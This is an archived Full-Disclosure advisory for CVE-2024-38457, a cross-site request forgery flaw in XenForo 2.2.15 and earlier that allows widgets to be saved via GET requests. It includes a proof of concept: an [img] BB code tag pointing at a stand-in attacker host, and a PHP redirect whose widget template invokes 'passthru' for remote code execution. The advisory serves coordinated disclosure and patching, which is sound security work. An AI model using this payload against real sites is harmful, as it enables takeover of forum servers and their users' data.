lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAJeQoQdiNSqh_ROuSgYbGi1KHME0z6AQR=PmMMGY8GLZoGb__Q@mail.gmail.com>
Date: Tue, 16 Jul 2024 15:58:13 +0200
From: Egidio Romano <n0b0d13s@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] [KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave)
 Cross-Site Request Forgery Vulnerability

-------------------------------------------------------------------------------
XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
-------------------------------------------------------------------------------


[-] Software Link:

https://xenforo.com


[-] Affected Versions:

Version 2.2.15 and prior versions.


[-] Vulnerability Description:

The XF\Admin\Controller\Widget::actionSave() method, defined into the
/src/XF/Admin/Controller/Widget.php script, does not check whether the
current HTTP request is a POST or a GET before saving a widget.
XenForo does perform anti-CSRF checks for POST requests only, as such
this method can be abused in a Cross-Site Request Forgery (CSRF)
attack to create/modify arbitrary XenForo widgets via GET requests,
and this can also be exploited in tandem with KIS-2024-06 to perform
CSRF-based Remote Code Execution (RCE) attacks.

Furthermore, XenForo implements a BB code system, as such this
vulnerability could also be exploited through "Stored CSRF" attacks by
abusing the [img] BB code tag, creating a thread or a private message
(to be sent to the victim user) like the following:

[img]https://attacker.website/exploit.php[/img]

Where the exploit.php script hosted on the attacker-controlled website
could be something like this:

<?php

$url = "https://victim.website/xenforo/";

header("Location:
{$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{\$xf.app.em.getRepository('XF\\Util\\Arr').filterRecursive(['id'],'passthru')}}");

?>

Successful exploitation of this vulnerability requires a victim user
with permissions to administer styles or widgets to be currently
logged into the Admin Control Panel.


[-] Solution:

Update to a fixed version or apply the vendor patches.


[-] Disclosure Timeline:

[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure
[05/06/2024] - Vendor released patches and fixed versions
[14/06/2024] - CVE identifier requested
[16/06/2024] - CVE identifier assigned
[16/07/2024] - Coordinated public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2024-38457 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Other References:

https://xenforo.com/community/threads/222133
https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/


[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-05
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ